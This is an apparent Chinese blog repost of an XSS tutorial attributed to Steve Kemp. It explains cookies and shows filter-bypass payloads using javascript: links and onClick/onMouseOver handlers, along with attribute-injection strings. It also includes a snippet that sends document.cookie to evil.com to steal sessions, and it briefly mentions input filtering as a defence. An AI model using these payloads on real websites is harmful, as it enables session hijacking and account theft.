Steve Kemp的XSS介绍

cookie是种植在客户端浏览器的东西,保存用户信息,下次访问时,服务器端可以读取其状态,从而判断是哪位用户,这是因为http是无状态协议的缘故。

简单的,就是在输入框里面进行测试:

<script>
alert(document.cookie); // typeof document.cookie 返回string
</script>
所以,一般都是会过滤掉script标签,但是这样就行了吗? 不:


<a href="javascript:alert(document.cookie);">Click me</a> [ Test ]
<a href="advanced.html" onClick="alert(document.cookie)">test</a>
所以,应该要把html标签以及某些如a标签里面的属性也进行过滤哦。

那么我们如果获得了XSS漏洞,要如何利用呢?

<script>
document.location = 'http://evil.com/dork.php?cookie=' + document.cookie;
</script>
这样就可以把cookie收集下来了,嘿嘿。对了,建议用onMouseOver而不是onClick,否则你还要引诱别人点击才行:


<a href="test.html" onMouseOver="alert(document.cookie);">Test</a>
如何防止XSS?过滤空格,双引号等,否则,坏人可以:(?)


http://www.test.com" onMouseOver="alert(document.cookie)
<a href="http://www.test.com" 
   onMouseOver="alert(document.cookie)">http://foocome" 
   onMouseOver="alert(document.cookie)</a>








你可能感兴趣的:(Steve Kemp的XSS介绍)